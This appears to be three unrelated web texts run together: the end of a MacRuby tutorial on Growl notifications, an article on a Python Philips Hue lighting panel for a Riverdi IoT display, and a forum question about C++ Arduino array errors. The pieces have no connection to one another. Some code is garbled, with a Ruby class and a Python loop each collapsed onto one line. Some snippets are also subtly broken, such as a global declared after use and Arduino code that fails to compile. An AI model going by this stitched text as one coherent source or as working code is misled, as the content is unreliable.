I’ll let you read all of the documentation on the settings you can supply here. The basics of what you need to know, though, is the “AllNotifications” and “DefaultNotifications” list. Under all notifications, you must supply the names of every notification type your app will send. If you send anything that is not in this list, Growl will ignore it. Under default notifications, you need to tell Growl which of the notification types to enable, by default.
Next, drag the .growlRegDict file from Resources down into “Targets/(project)/Copy Bundle Resources”.
This will copy the resource so that the Growl Application Bridge will be able to find it at runtime.
Configuring Your App To Use Growl
From what I have read, a standard Xcode app will have various application delegates set up. I’m still not entirely sure how to describe these, other than they are classes that meet specific API needs and provide callback methods for various parts of your app. Perhaps the closest thing I can think of from my .NET days is the Event system, which does use delegates under the hood. However, there is a significant difference between a .NET delegate and an XCode/OSX delegate.
If you do not have an app delegate set up, you need to create one for two purposes:
- To register your app with Growl, at startup
- To use Growl callbacks for various events
Add a new ruby document to your project. I called it “ApplicationDelegate.rb” and placed it in the Classes folder of my project:
In this file, define a ruby class called ApplicationDelegate (though the name doesn’t matter that much at this point) and put the following code in it:
framework "Growl"class ApplicationDelegatedef awakeFromNib()GrowlApplicationBridge.setGrowlDelegate(self)endend
This code will tell Growl that your application is going to be sending notifications, once we have told the system that this class is an application delegate. To do that, open the Interface Builder by double clicking "MainMenu.xib" in the "Resources" folder of your project. Open the Library window by pressing "shift-cmd-L" (or however you want to get it open) and find an Object. Drag an Object over to your MainMenu.xib window, and drop it there. This adds an object that we can wire up to our UI.
Double click on the Object you just created to open the Info dialog. Set the "Class Identity" to your ApplicationDelegate class.
Then hold down control on your keyboard and click-and-drag from “File’s Owner” down to the “Object” that you just added.
Let go of the mouse button and select “Delegate” from the resulting dialog. This will wire up your ApplicationDelegate so that the “awakeFromNib” method will fire when your app starts up, which will then register your app with Growl.
Make Your App Growl
Now for the fun part… we get to make the app Growl! At a very basic level, it’s easy. All you need to do is call the “GrowlApplicationBridge.notifyWithTitle” method. Somewhere in your app, you need to have some code that calls this method. To start with, you can put it directly into your awakeFromNib method in your Application Delegate class. This will fire off a Growl notification as soon as your app starts up.
def awakeFromNib()
  GrowlApplicationBridge.setGrowlDelegate(self)
  # the title and description strings here are illustrative -
  # use whatever text you want to show
  GrowlApplicationBridge.notifyWithTitle("My First Notification",
    description: "Hello from MacRuby and Growl!",
    notificationName: "Test",
    iconData: nil,
    priority: 0,
    isSticky: false,
    clickContext: nil)
end
You can read all the documentation on what these options do. For the most part, though, you need to pay attention to the first parameter and the “description” and “notificationName” in the hash.
The first parameter is the title of the notification. The remaining parameters are all technically a ruby hash using the succinct “key: value” syntax. The “description” is the large text body of the notification that is being sent. The “notificationName” is very important – it’s the name of the notification type that you are sending, and it must be one of the types that you set up in your “Growl Registration Ticket.growlRegDict” file. If you don’t use one that was set up in that file, Growl will ignore the notification.
Assuming my instructions are good, you should be able to run the app from Xcode and see a Growl notification!
That wasn’t too bad, was it?
And There’s So Much More
I’ve only just started learning MacRuby, XCode, Cocoa, Growl and all the things related to all of this. I know there’s so much more that I’ll be picking up on in the next few weeks while I’m trying to put together my little app. I’ll try to keep posting walk throughs like this, to help out those who would like to learn a little more.
As a preview of what else I’ve learned, though, you can set up a callback from a Growl notification so that when you click on the notification a chunk of code in your app will be executed. This opens up nearly limitless possibilities of what you can do with a Growl notification – launch a web page, launch another app, move your app into a specific feature, and more!
I’ll show you how to set up the click callback delegate in my next post.
Resources
Here are some of the resources I used when figuring this out
- – developer documentation with links to the SDK download
- – a complete MacRuby app, with Growl notifications. I learned a little more about the Growl registration dictionary and how to set up an Application Delegate by examining this project’s source code through Github, directly.
- – the basic tutorial that I followed, after learning about the Growl.framework that the Growl developers provide. This is written specifically for XCode and Objective-C, so I had to improvise and interpret a few things in order to do it in MacRuby.
- – discussion about a problem I ran into with the Growl-WithInstaller.framework. I ended up switching back to the plain Growl.framework for now. Hopefully I can get around the problem or find a solution to it, though. I would really like to deliver Growl with the app I’m building.
27 Aug 2019, 10:45
Philips Hue Intelligent lighting control panel demo in Python – using Riverdi IoT Displays powered by Zerynth
For the past few years, programming embedded systems has not been the exclusive domain of assembler enthusiasts or of low-level operations on microcontroller registers. The dynamic development of the Internet of Things has led a significant number of high-level language programmers to shift their professional interests from high-performance PCs to small microprocessors and microcontrollers. This trend has not gone unnoticed by hardware and software manufacturers, who provide developers with ready-made solutions that allow fast - and above all - high-level preparation of a complete hardware and software project.
In this article, we will build a simple control system for Philips Hue series bulbs, using the intelligent Riverdi IoT Display module, the dedicated Zerynth programming environment, and the OKdo IoT Cloud - enabling easy and quick application development using Python. Now, let's get started.
Table of Contents:
- About Riverdi IoT Display displays and the Philips Hue system
- IoT software in Python – it’s easier than you think!
- Start writing the code
- Programming in Python with Zerynth Studio
- Graphical interface
- OKdo IoT Cloud
About Riverdi IoT Display displays and the Philips Hue system
The aim of the presented project is to build an intelligent control panel for the Philips Hue lighting system; thanks to our partnership with Zerynth, the Zerynth programming environment will enable us to write the whole application in Python.
Figure 1 - the back of the Riverdi IoT display
The main task for the Riverdi IoT Display module will be to establish communication with the Philips Hue intelligent lighting system. In the described case, the lighting system consists of two light bulbs with simple on/off control and one RGB bulb, controlled by determining the hue, brightness, and colour saturation parameters. The heart of the system is Philips Hue Bridge, connected to the local area network using an Ethernet cable and communicating with light bulbs using the ZigBee protocol. The block diagram of the existing configuration and its planned expansion with an intelligent control panel module is shown in Figure 2.
Figure 2. Block diagram of the projected lighting control system
IoT software in Python – it’s easier than you think!
The chosen hardware solution allows us to quickly move to issues related directly to the software. This process starts with the download of an integrated and cross-platform (made available for Windows, Linux, and macOS) programming environment called Zerynth Studio.
The entire installation process of Zerynth Studio runs in a standard manner for the selected operating system. When the installer is started for the first time, the user will be asked to accept the license agreement and choose the installation method (online or offline installation – if the user has previously downloaded library repositories). The last step in the installation process is the choice of the software version (at the time of creating the article, the last available version is the version r2.3.0):
Figure 3. The software version selection window
Now, our environment is ready for work. But before we start writing the first lines of code, it is worth creating a simple block diagram, showing the way the designed application works – Figure 4.
Figure 4. A block diagram showing the way the application design works
We start the application by configuring the display and displaying a simple logo, which will allow us to ensure that the first configuration process has run correctly. In the next step, we connect to the WiFi network defined directly in the program (saving the SSID of the network and the access password is not the safest solution, but for the needs of the home control system that is fully sufficient).
After a successful connection to the WiFi network, the system user will be asked to enter the IP address of the Philips Hue Bridge device. The correctness of the entered IP address is verified by an attempt to read the device status. The penultimate step – before displaying the main application interface – is the process of creating a new system user and its authorization (in the final solution, this stage will be executed once).
A correctly completed process for creating a new user and its authorization, allow us to go to the last level of the menu, which is the display of the control panel. As shown in Figure 2, the existing lighting system consists only of three light bulbs (including one with the possibility of colour control), so the control panel can be implemented in the form of a “single-screen”, as shown in Figure 5.
Figure 5. The main menu of the lighting control panel
Having prepared a complete block diagram of the implemented application, we can proceed to write the first lines of the code.
The process of preparing the application starts with the creation of a new project in Zerynth Studio.
In the main.py file created by default, we will place the main functionality of the program. According to the adopted block diagram from Figure 4, the application starts with the display configuration. In the Riverdi IoT Display module, the role of the graphics engine is played by the Bridgetek BT815 chip. This system acts as an intelligent bridge between the LCD display (connected to the BT815 system using a 24-bit RGB interface) and a microcontroller. A typical BT815 application is shown in Figure 6.
Figure 6. A typical BT81x application
Thanks to the use of the BT815 system, the user’s application is exempt from the obligation to create frame buffers in the RAM area and to implement low-level “drawing” functions of the interface. The BT815 system defines both a series of simple graphical objects (buttons, switches, sliders, etc.) enabling quick creation of applications as well as more complex functions related to graphics compression or media playback.
Complete documentation of the system together with the Programming Guide – presenting the possibilities of the system is available here.
With the support of the Riverdi IoT Display module, Zerynth developers have prepared a simple-to-use API for BT81x circuits, enabling the creation of an interface using a few simple functions. The complete Zerynth API for BT81x systems is available in the Zerynth documentation.
With the use of the above documentation, let’s proceed with the first changes in the main.py file. The edition starts with the import of library modules for BT81x systems and the 5-inch Riverdi display:
from bridgetek.bt81x import bt81x
from riverdi.displays.bt81x import ctp50
In the next step, we initialize the display and communication via the selected SPI interface, additionally assigning the Chip Select line, Interrupt, Power Down line and the bus speed (default – 3 MHz).
For the integrated Riverdi IoT display, these values are fixed and take the form of the following line of code:
bt81x.init(SPI0, D4, D33, D34)
After the correct initialization of the system, we can proceed to display a simple logo. For this purpose, the selected graphic must be pre-loaded into the BT81x internal GRAM memory. We place the loadImage() function in a newly created gui.py file:
def loadImage(image):
    bt81x.load_image(0, 0, image)
The task of the loadImage() function is only to call the bt81x.load_image() method, whose parameters are: the address in the GRAM memory area, additional control flags and the file name of the selected graphic. In the prepared application - in the GRAM memory area - we will store only one graphic at a time, so the address in memory will always be set to 0. For testing purposes, we will use a graphic in PNG format with the Riverdi logo, 642×144 pixels - the remaining area of the image (for a 5-inch display it is 800×480 pixels) will be filled with a white background. In the main.py file, we load the gui_riverdi_logo.png graphic into the GRAM memory with the following set of calls:
import gui

new_resource('images/gui_riverdi_logo.png')
gui.loadImage('gui_riverdi_logo.png')
For full functionality, let’s implement the showLogo () function, which displays the loaded image in the specified coordinates. For this purpose – in the gui.py file – place the following code fragment:
def showLogo():
    # start
    bt81x.dl_start()
    bt81x.clear_color(rgb=(0xff, 0xff, 0xff))
    bt81x.clear(1, 1, 1)
    # image
    # (the Bitmap setup, prepare_draw() and draw() calls described
    # below go here)
    # display
    bt81x.display()
    bt81x.swap_and_empty()
Using the bt81x.dl_start () method, we start creating a new Display List that describes the currently created frame. Calling bt81x.clear_color () sets the colour for the image cleansing operation, which is done by the bt81x.clear () method. Using the Bitmap class, we define the parameters of the displayed image, including image source (in this case it is GRAM memory) and its size. Use the bt81x.prepare_draw () and bt81x.draw () calls to add the indicated graphics to the Display List. Each creation of the Display List by means of the bt81x.dl_start () call must be terminated by calling bt81x.display () – terminating its creation, and calling bt81x.swap_and_empty (), which changes the currently displayed content. The showLogo () function constructed in this way is called directly in the main.py file.
Communication between the control panel and the Philips Hue bridge will be made using the local network. For this purpose, it is necessary to connect the Riverdi IoT Display module to the WiFi network. Thanks to the use of the ESP32 system – integrating WiFi communication modules and Bluetooth Low Energy – the user does not have to connect any additional wireless modems. In order to establish a connection with the selected WiFi network (specified ssid variable and the access password – wifiPWD variable), in the main.py file, we will implement the following code fragment:
from wireless import wifi
from espressif.esp32net import esp32wifi as wifi_driver

ssid = "ssid_value"        # this is the SSID of the WiFi network
wifiPWD = "password_value" # this is the Password for WiFi

gui.showSpinner("Connecting with predefined WiFi network...")
wifi_driver.auto_init()
for _ in range(0,5):
    try:
        wifi.link(ssid, wifi.WIFI_WPA2, wifiPWD)
        break
    except:
        gui.showSpinner("Trying to reconnect...")
else:
    gui.showSpinner("Connection Error - restarting...")
    mcu.reset()
Using the for () loop and the wifi.link () method, the application attempts to connect to a defined network five times. If the operation fails completely, the mcu.reset () function will reset the device. Depending on the strength of the WiFi network signal, the linking process may be longer, so that the system user receives feedback from the graphical interface, it is informed about the progress of the process by calling the gui.showSpinner () function, which displays the animated Spinner object specified by the argument message. The showSpinner () function is defined in the gui.py file:
def showSpinner(msg):
    bt81x.dl_start()
    bt81x.clear(1, 1, 1)
    txt = bt81x.Text(400, 350, 30, bt81x.OPT_CENTERX | bt81x.OPT_CENTERY, msg, )
    bt81x.add_text(txt)
    bt81x.spinner(400, 240, bt81x.SPINNER_CIRCLE, 0)
    bt81x.display()
    bt81x.swap_and_empty()
Using the above function, in the newly created Display List we place elements like Spinner and Text – the whole list is closed with calls bt81x.display () and bt81x.swap_and_empty (). The resulting graphic effect is shown in Figure 7.
Figure 7. A screen with a Spinner object informing the user about the progress of processes
In the next step – after successfully connecting to the WiFi network – we can start to create a graphical interface that allows entering the IP address assigned to the Philips Hue Bridge device. For the construction of the interface, we use the bt81x.add_keys () method, which places a single row of buttons in Display List – for an example call:
bt81x.add_keys(450, 70, 280, 60, 30, 0, "123")
The obtained effect will look like this:
Figure 8. A single line of buttons created using bt81x.add_keys ()
Graphical interface
Let’s go back to the operation of preparing the graphical interface. The screen for entering the IP address will consist of a 4-line keyboard (digits from 0-9, a dot symbol and a button to delete incorrectly entered values), a Connect button and a simple graphic. The entire operation was implemented in the form of the showAddrScreen () function in the gui.py file:
def showAddrScreen(ip):
    # start
    bt81x.dl_start()
    bt81x.clear(1, 1, 1)
    # image
    image = bt81x.Bitmap(1, 0, (bt81x.ARGB4, 200 * 2),
                         (bt81x.BILINEAR, bt81x.BORDER, bt81x.BORDER, 200, 200))
    image.prepare_draw()
    image.draw((0, 255), vertex_fmt=0)
    # text
    txt = bt81x.Text(225, 120, 29, bt81x.OPT_CENTERX | bt81x.OPT_CENTERY,
                     "Enter IP address of HUE Bridge:", )
    bt81x.add_text(txt)
    txt.text = ip
    txt.x = 225
    txt.y = 195
    txt.font = 31
    bt81x.add_text(txt)
    # keys
    bt81x.track(450, 350, 280, 60, 0)
    bt81x.add_keys(450, 70, 280, 60, 30, 0, "123")
    bt81x.add_keys(450, 140, 280, 60, 30, 0, "456")
    bt81x.add_keys(450, 210, 280, 60, 30, 0, "789")
    bt81x.add_keys(450, 280, 280, 60, 30, 0, ".0C")
    # connect button
    btn = bt81x.Button(450, 350, 280, 60, 30, 0, "Connect")
    bt81x.tag(1)
    bt81x.add_button(btn)
    bt81x.display()
    bt81x.swap_and_empty()
By using the bt81x.tag() method in the showAddrScreen() function, the value of the TAG identifier is assigned to the Connect button. The keypad buttons generated by the series of bt81x.add_keys() calls return, as the TAG field, the ASCII codes corresponding to the individual key labels. Handling of all touch events is performed in the callback function pressed(), registered via the bt81x.touch_loop() call. A fragment of the pressed() function - associated with keyboard support - is shown below:
def pressed(tag, tracked, tp):
    # entering HUE IP
    if (screenLayout == 2):
        global hueIP
        global screenLayout
        # emit sound
        beep()
        # remove last character
        if (tag != 67):
            # max length of IP
            if len(hueIP) >= 15:
                return
            hueIP = hueIP + str(chr(tag))
        else:
            if len(hueIP) > 0:
                hueIP = hueIP[:-1]
        # connect -> go to next screen
        if (tag == 1):
            hueIP = hueIP[:-1]
            screenLayout = 3
The call to the showAddrScreen () function is performed in the while () loop (in the main.py file) until the Connect button is selected (this process is repeated if the entered IP address of the device is incorrect):
gui.loadImage('gui_addr_hue.png')
while True:
    # enter IP address of HUE gateway
    screenLayout = 2
    while (screenLayout == 2):
        gui.showAddrScreen(hueIP)
    # show spinner (looking for HUE)
    screenLayout = 3
    gui.showSpinner("Looking for HUE Bridge...")
    # check HUE availability
    status = hue.testConnection(hueIP)
    if (status):
        break;
The final effect of calling the showAddrScreen () function is shown in Figure 9.
Figure 9. Interface to enter the IP address of the Philips Hue Bridge device
After the correct indication of the IP address of the Philips Hue Bridge device, the control panel will go to the authorization stage (issues related directly to establishing a connection, authorization and communication protocol with Philips Hue Bridge, will be discussed later in the article). At this point, the message displayed to the user will be limited only to a simple graphic and a short message asking you to press the button located on the Philips bridge housing (it is a confirmation that the system user has physical access to the device). For displaying the message and graphics, the showAuthScreen () function from the gui.py file will be responsible:
def showAuthScreen():
    bt81x.dl_start()
    bt81x.clear(1, 1, 1)
    image = bt81x.Bitmap(1, 0, (bt81x.ARGB4, 420 * 2),
                         (bt81x.BILINEAR, bt81x.BORDER, bt81x.BORDER, 420, 480))
    image.prepare_draw()
    image.draw((0, 0), vertex_fmt=0)
    txt = bt81x.Text(590, 220, 28, bt81x.OPT_CENTERX | bt81x.OPT_CENTERY,
                     "Press the push-link button of the Hue", )
    bt81x.add_text(txt)
    txt.text = "bridge you want to connect to"
    txt.x = 590
    txt.y = 260
    bt81x.add_text(txt)
    bt81x.display()
    bt81x.swap_and_empty()
In the main.py file – before displaying the message asking for authorization – add a short intermediate screen (using the previously prepared function showSpinner ()). During this time, to the GRAM memory of the BT81x controller, we upload the graphic file gui_auth_hue.png, which is used in the construction of the interface from the function showAuthScreen (). All operations will be performed in the while () loop until the user is properly authorized (the createUser () function will be discussed later in the article):
gui.showSpinner("Creating new user...") gui.loadImage('gui_auth_hue.png') while True: # show authScreen screenLayout = 5 gui.showAuthScreen() # check status username = hue.createUser(hueIP) if (username): break;
Leaving the above while () loop is tantamount to successfully terminating the connection process with Philips Hue Bridge. So the time has come to display the main control screen, consisting of ON / OFF buttons for two bulbs and control elements for one “coloured” light bulb. Before we go on to discuss the code snippets, let’s look at the final effect presented in Figure 10 beforehand.
Figure 10. The interface of the main control panel
The main control panel is definitely more extensive than the previous screens of the application – a single addition of 10 buttons and 8 text elements would complicate the main function very much, and the possible introduction of adjustments of the positions of individual interface elements would be very tedious. For this purpose, all components of the main interface are described using the JSON array, and their placement on the Display List, grouped into two for () loops (separate for Button and Text elements). Fragments of JSON descriptions are presented below:
buttons = [
    { "tag_id": 2, "text": "ON", "x_cord": 50, "y_cord": 200,
      "width": 170, "height": 50, "size": 30 },
    { "tag_id": 3, "text": "OFF", "x_cord": 50, "y_cord": 300,
      "width": 170, "height": 50, "size": 30 },
    /.../
    { "tag_id": 11, "text": ">", "x_cord": 675, "y_cord": 350,
      "width": 50, "height": 50, "size": 30 },
]

labels = [
    { "text": "Kitchen", "x_cord": 136, "y_cord": 140, "size": 31,
      "options": bt81x.OPT_CENTER },
    /.../
    { "text": "Brightness", "x_cord": 622, "y_cord": 330, "size": 28,
      "options": bt81x.OPT_CENTER },
]
Parsing the individual elements of the JSON description, adding them to the Display List, and displaying the final result is handled by the showMainMenu() function in the gui.py file:
def showMainMenu(saturation, hue, brightness):
    bt81x.dl_start()
    bt81x.clear(1, 1, 1)
    image = bt81x.Bitmap(1, 0, (bt81x.ARGB4, 800 * 2),
                         (bt81x.BILINEAR, bt81x.BORDER, bt81x.BORDER, 800, 50))
    image.prepare_draw()
    image.draw((0, 0), vertex_fmt=0)
    btn = bt81x.Button(0, 0, 170, 70, 31, 0, "")
    for button in buttons:
        btn.text = button["text"]
        btn.font = button["size"]
        btn.x = button["x_cord"]
        btn.y = button["y_cord"]
        btn.width = button["width"]
        btn.height = button["height"]
        bt81x.track(btn.x, btn.y, button["width"], button["height"], button["tag_id"])
        bt81x.tag(button["tag_id"])
        bt81x.add_button(btn)
    txt = bt81x.Text(0, 0, 0, 30, "")
    for label in labels:
        txt.text = label["text"]
        txt.x = label["x_cord"]
        txt.y = label["y_cord"]
        txt.font = label["size"]
        txt.options = label["options"]
        bt81x.add_text(txt)
    # saturation value label
    txt.text = str(int((saturation/240)*100)) + '%'
    txt.x = 622
    txt.y = 175
    txt.font = 30
    txt.options = bt81x.OPT_CENTER
    bt81x.add_text(txt)
    /.../
    # brightness value label
    txt.text = str(int((brightness/240)*100)) + '%'
    txt.x = 622
    txt.y = 375
    txt.font = 30
    txt.options = bt81x.OPT_CENTER
    bt81x.add_text(txt)
    # display
    bt81x.display()
    bt81x.swap_and_empty()
The cyclic call to the showMainMenu () function has been placed in the main.py file in the main program loop. The main loop updates the values presented in the graphical interface, checks the status of variables representing states of controlled bulbs and in the event of changes (resulting from touch panel operation and event handling in the call function pressed ()) sends messages to the Philips Hue Bridge device:
while True:
    gui.showMainMenu(saturation_old_value, hue_old_value, brightness_old_value)
    if (bulb_1_new_value != bulb_1_old_value):
        hue.turnLight(hueIP, username, "4", bulb_1_new_value)
        bulb_1_old_value = bulb_1_new_value
    if (bulb_2_new_value != bulb_2_old_value):
        hue.turnLight(hueIP, username, "2", bulb_2_new_value)
        bulb_2_old_value = bulb_2_new_value
    if (saturation_new_value != saturation_old_value):
        hue.changeColor(hueIP, username, "3", True, saturation_new_value,
                        brightness_new_value, hue_new_value)
        saturation_old_value = saturation_new_value
    if (hue_new_value != hue_old_value):
        hue.changeColor(hueIP, username, "3", True, saturation_new_value,
                        brightness_new_value, hue_new_value)
        hue_old_value = hue_new_value
    if (brightness_new_value != brightness_old_value):
        hue.changeColor(hueIP, username, "3", True, saturation_new_value,
                        brightness_new_value, hue_new_value)
        brightness_old_value = brightness_new_value
The updated fragment of the pressed () function is shown below:
def pressed(tag, tracked, tp):
    # entering HUE IP
    if (screenLayout == 2):
        /.../
    # mainmenu screen
    elif (screenLayout == 7):
        global bulb_1_new_value
        global bulb_2_new_value
        # on/off switching
        if (tag == 2):
            bulb_1_new_value = True
        elif (tag == 3):
            bulb_1_new_value = False
        elif (tag == 4):
            bulb_2_new_value = True
        elif (tag == 5):
            bulb_2_new_value = False
        elif (tag == 6):
            if (saturation_new_value > 0):
                saturation_new_value -= 24
        elif (tag == 7):
            if (hue_new_value > 0):
                hue_new_value -= 6550
        /.../
        elif (tag == 11):
            if (brightness_new_value < 240):
                brightness_new_value += 24
So far we have successfully avoided all aspects of communication with the Philips Hue bridge, but it's time to devote a few moments to this device and how it communicates with the world. In the most popular configuration, the Philips Hue Bridge acts as an intermediary in communication between the mobile application and the terminal devices. The programmers of the Philips Hue system, however, went a step further and, instead of creating a closed system on the mobile application <-> bridge line, decided to prepare an open and well-documented API, thus allowing external programmers to create their own control and system management devices.
A set of information related to the creation of own applications has been made available here.
Another nod to programmers is a simple interface that allows testing the API and system operation without creating a dedicated application. This interface - called the CLIP API Debugger - is served by the bridge itself. (The address of the Philips bridge can be determined by using the UPnP protocol or by reading the configuration of the home router.)
The appearance of the CLIP API Debugger interface window is shown in Figure 11.
Figure 11. The interface of the CLIP API Debugger panel
Communication with Philips Hue Bridge is carried out using HTTPS and REST API calls, so the interface window has been divided into the URL field, the choice of method type (GET, PUT, POST or DELETE) and the BODY section in which JSON queries are placed.
Before we move on to the question of controlling the work of light bulbs, it is necessary to create a new user and its authorization beforehand. To create a new user, make the following call:
URL: /api
Body: {"devicetype":"my_hue_app#Riverdi IoT Display"}
Method: POST
In response, we’ll get:
[ { "error": { "type": 101, "address": "", "description": "link button not pressed" } } ]
To increase the security of the system, it is necessary to properly authorize the user. In the received communication, the user is asked to press a button placed on the device casing – this procedure is to confirm that the person attempting to gain access to the lighting control also has physical access to the control bridge. Pressing the button and re-sending the POST request above will be confirmed by the following message:
[ { "success": { "username": "JxeQj8Xvi1zLDBnDz09w1aCjWA80rDxbQNYUlOCn" } } ]
The value of the username field is the name of the newly authorized user, which will be used in further communication. However, let's get back to the code of our application for a moment and consider how to accomplish the above tasks using Python and the set of libraries provided by Zerynth. The requests module comes to our help (for Python programmers this name is probably well known - the module's API is inspired by the quite popular module of the same name). This module enables fast implementation of HTTP support, with the GET, POST, PUT and DELETE calls available in the form of single functions. The full API documentation for the requests module is available in the Zerynth docs.
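As a small illustration of the module in use, here is a hypothetical helper - it is not part of the article's code, but it follows the same pattern as the createUser() function shown next:

import requests
import json

def getLights(ip, user):
    # ask the bridge for the list of bulbs it knows about
    response = requests.get("http://" + ip + "/api/" + user + "/lights")
    return json.loads(response.content)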
The createUser () function – based on calls from the requests module – responsible for creating a new user is defined in the hue.py file:
def createUser(ip):
    try:
        response = requests.post("http://" + ip + "/api",
                                 json={"devicetype": "my_hue_app#Riverdi IoT Display"})
        js = json.loads(response.content)
        return js[0]["success"]["username"];
    except Exception as e:
        return None;
The above function is performed in a loop until the value of success in the response returned by the bridge is read. To the main program loop, this function returns the value read from the username field, which will be used in subsequent calls controlling the status of light bulbs:
while True:
    # show authScreen
    screenLayout = 5
    gui.showAuthScreen()
    # check status
    username = hue.createUser(hueIP)
    if (username):
        # todo save user and password to flash
        break;
Obtaining the name of an authorized user allows us to read the system configuration, i.e. the list of connected bulbs, their status, identification numbers, etc.:
URL: /api/<username>/lights
Body: [none]
Method: GET
The fragment of the system response (for a configuration with three bulbs – as shown in Figure 2) is shown below:
{ "2": { "state": { "on": false, "bri": 254, "alert": "select", "mode": "homeautomation", "reachable": false }, "swupdate": { "state": "noupdates", "lastinstall": "2019-06-06T12:55:19" }, "type": "Dimmable light", "name": "Hue white lamp 2", "modelid": "LWB010", "manufacturername": "Philips", "productname": "Hue white lamp", "capabilities": { "certified": true, "control": { "mindimlevel": 2000, "maxlumen": 806 }, "streaming": { "renderer": false, "proxy": false } }, "config": { "archetype": "classicbulb", "function": "functional", "direction": "omnidirectional", "startup": { "mode": "safety", "configured": true } }, /.../ }, "3": { "state": { "on": false, "bri": 24, "hue": 45850, "sat": 240, "effect": "none", "xy": [ 0.1666, 0.1016 ], "ct": 153, "alert": "select", "colormode": "hs", "mode": "homeautomation", "reachable": false }, "swupdate": { "state": "readytoinstall", "lastinstall": "2019-07-04T12:22:06" }, "type": "Extended color light", "name": "Hue color lamp 1", "modelid": "LCT015", "manufacturername": "Philips", "productname": "Hue color lamp", "capabilities": { "certified": true, "control": { "mindimlevel": 1000, "maxlumen": 806, "colorgamuttype": "C", "colorgamut": [ [ 0.6915, 0.3083 ], [ 0.17, 0.7 ], [ 0.1532, 0.0475 ] ], "ct": { "min": 153, "max": 500 } }, "streaming": { "renderer": true, "proxy": true } }, "config": { "archetype": "sultanbulb", "function": "mixed", "direction": "omnidirectional" }, /.../ }, "4": { "state": { "on": false, "bri": 254, "alert": "select", "mode": "homeautomation", "reachable": false }, "swupdate": { "state": "transferring", "lastinstall": "2019-07-05T12:53:52" }, "type": "Dimmable light", "name": "Hue white lamp 3", "modelid": "LWB010", "manufacturername": "Philips", "productname": "Hue white lamp", "capabilities": { "certified": true, "control": { "mindimlevel": 5000, "maxlumen": 806 }, "streaming": { "renderer": false, "proxy": false } }, "config": { "archetype": "classicbulb", "function": "functional", "direction": "omnidirectional" }, /.../ } }
The current status of an individual lamp can be checked by adding the device's identification number to the GET query, e.g.:
URL: /api/<username>/lights/2
Body: [none]
Method: GET
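A matching helper for reading a single lamp could look like the sketch below; getLightState is our own name for illustration, mirroring the style of the article's hue.py functions:

def getLightState(ip, user, num):
    # GET /api/<username>/lights/<num> returns the lamp's full description
    try:
        response = requests.get("http://" + ip + "/api/" + user + "/lights/" + num)
        js = json.loads(response.content)
        return js["state"]  # e.g. {'on': False, 'bri': 254, ...}
    except Exception as e:
        return None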
Changing the basic on/off status of a light bulb is carried out by calling the PUT method:

URL: /api/<username>/lights/2/state
Body: {"on": false}
Method: PUT
Changing the status of a coloured light requires specifying not only its new on/off state but also values for hue, brightness and saturation:
URL: /api/<username>/lights/2/state
Body: {"on": true, "sat": 254, "bri": 254, "hue": 10000}
Method: PUT
Based on the above API, and again using the requests module, the turnLight() and changeColor() functions were prepared:
def turnLight(ip, user, num, state):
    try:
        addr = "http://" + ip + "/api/" + user + "/lights/" + num + "/state"
        requests.put(addr, json={"on": state})
    except Exception as e:
        return None

def changeColor(ip, user, num, state, sat, bri, hue):
    try:
        addr = "http://" + ip + "/api/" + user + "/lights/" + num + "/state"
        requests.put(addr, json={"on": state, "sat": sat, "bri": bri, "hue": hue})
    except Exception as e:
        return None
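A short usage sketch tying these helpers together (the lamp ids "2" and "3" and the parameter values are arbitrary examples; hueIP and username come from the discovery and pairing steps described earlier):

# hypothetical calls from the main program loop
hue.turnLight(hueIP, username, "2", True)                      # switch lamp 2 on
hue.changeColor(hueIP, username, "3", True, 254, 254, 10000)   # warm colour at full brightness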
OKdo IoT Cloud
Is this the end of the possibilities of this extraordinary mix which is the Riverdi IoT Display and the Zerynth environment? Certainly not! To provide remote control over the lighting system, the application can be extended, with just a few lines of code, to synchronize remotely with the OKdo IoT Cloud solution [6]. This solution allows us to remotely monitor and control our lighting system using a mobile device or web interface.
The OKdo Cloud is free, and you can easily sign up for the account, on the official page linked above. As they say on the OKdo Cloud page:
“Connect your things and interact with them for free on the OKdo Cloud.”
OKdo IoT Cloud provides connectivity endpoints for MQTT, HTTP, and UDP protocols.
Details related to the API for communication with the OKdo IoT Cloud are provided on the Zerynth docs.
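As a rough illustration of what such remote synchronization can look like, here is a hypothetical MQTT publish using the desktop paho-mqtt client; the broker host, topic, and payload layout are invented for this sketch, so consult the OKdo IoT Cloud and Zerynth documentation for the real endpoint and message format:

import json
import paho.mqtt.client as mqtt

client = mqtt.Client()
client.connect("broker.example.com", 1883)  # placeholder broker address
# publish the current state of lamp "2" on an illustrative topic
client.publish("home/lights/2", json.dumps({"on": True, "bri": 254}))
client.disconnect()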
The full application source code is available on the Riverdi GitHub repository.
Resources:
[1]
[2]
[3]
[4]
[5]
[6]
So I am just trying to make an array of objects of my custom class bcLed and I am getting the error below.
error: no match for 'operator=' (operand types are 'bcLed' and 'bcLed*')
Can someone tell me why? I know it will be something simple.

Also, while I am here: is there a way to create an array of unspecified length in C++ and then just append a new element each time I want to add an object to it?
void PopulateLEDS(){
int i;
bcLed ledArr[17];
for (i = 0; i< 16; i++)
{
ledArr[i] = new bcLed();
ledArr[i].id = i;
ledArr[i].charge = 0;
}
}
/Users/bencawley/Documents/Arduino/Test/Bens_Lights/Bens_Lights.ino: In function 'void PopulateLEDS()':
Bens_Lights:49: error: expected primary-expression before 'public'
public:bcLed ledArr[17];
^
Bens_Lights:52: error: 'ledArr' was not declared in this scope
ledArr[i].id = i;
^
/Users/bencawley/Documents/Arduino/Test/Bens_Lights/Bens_Lights.ino: In function 'void BensPattern(uint8_t)':
Bens_Lights:69: error: 'ledArr' was not declared in this scope
strip.setPixelColor(i,0, 0, ledArr[i].charge, 0);
^
Using library Adafruit_NeoPixel at version 1.0.6 in folder: /Users/bencawley/Documents/Arduino/libraries/Adafruit_NeoPixel
exit status 1
expected primary-expression before 'public'
class bcLed{
public:int id;
public:int charge;
void incCharge(int amt)
{
charge = charge+amt;
if(charge >= 255){charge = 255;}
}
};
void setup() {
strip.begin();
strip.show(); // Initialize all pixels to 'off'
PopulateLEDS();
}
void loop() {
// Some example procedures showing how to display to the pixels:
BensPattern(45);
}
void PopulateLEDS(){
int i;
bcLed ledArr[17];
for (i = 0; i< 17; i++)
{
ledArr[i].id = i;
ledArr[i].charge = 0;
}
}
void BensPattern(uint8_t wait)
{
uint16_t i, j;
int rn = rand() % strip.numPixels() ;
for (i = 0; i<strip.numPixels(); i++)
{
strip.setPixelColor(i,0, 0, 0, 0);
}
for (i = 0; i<rn; i++)
{
strip.setPixelColor(i,0, 0, ledArr[i].charge, 0);
ledArr[i].incCharge(1);
}
strip.show();
delay(wait);
}
